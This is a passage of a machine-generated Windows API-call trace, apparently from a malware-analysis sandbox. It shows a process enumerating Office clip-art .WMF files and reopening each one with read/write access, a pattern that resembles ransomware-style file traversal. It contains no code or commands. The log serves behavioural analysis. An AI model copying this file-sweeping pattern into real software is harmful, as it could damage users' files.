InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.310] AreFileApisANSI () returned 1 [0103.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.310] AreFileApisANSI () returned 1 [0103.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.311] GetFileType (hFile=0x33c) returned 0x1 [0103.311] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.311] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.311] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.311] CloseHandle (hObject=0x33c) returned 1 [0103.311] AreFileApisANSI () returned 1 [0103.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0103.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 69 [0103.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.312] GetFileType (hFile=0x33c) returned 0x1 [0103.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0103.312] CloseHandle (hObject=0x33c) returned 1 [0103.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0103.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0103.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0103.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0103.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.313] AreFileApisANSI () returned 1 [0103.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0103.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 69 [0103.313] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x804)) returned 1 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0103.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0103.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.314] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15cc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00440_.WMF", cAlternateFileName="")) returned 1 [0103.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0103.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0103.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0103.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0103.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0103.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0103.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.315] AreFileApisANSI () returned 1 [0103.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0103.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0103.315] AreFileApisANSI () returned 1 [0103.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a238 [0103.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 69 [0103.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.315] GetFileType (hFile=0x33c) returned 0x1 [0103.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0103.315] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.316] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.316] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.316] CloseHandle (hObject=0x33c) returned 1 [0103.316] AreFileApisANSI () returned 1 [0103.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0103.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 69 [0103.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.316] GetFileType (hFile=0x33c) returned 0x1 [0103.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0103.316] CloseHandle (hObject=0x33c) returned 1 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.318] AreFileApisANSI () returned 1 [0103.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0103.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 69 [0103.318] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15cc)) returned 1 [0103.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0103.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0103.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.318] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdc4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00441_.WMF", cAlternateFileName="")) returned 1 [0103.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0103.319] 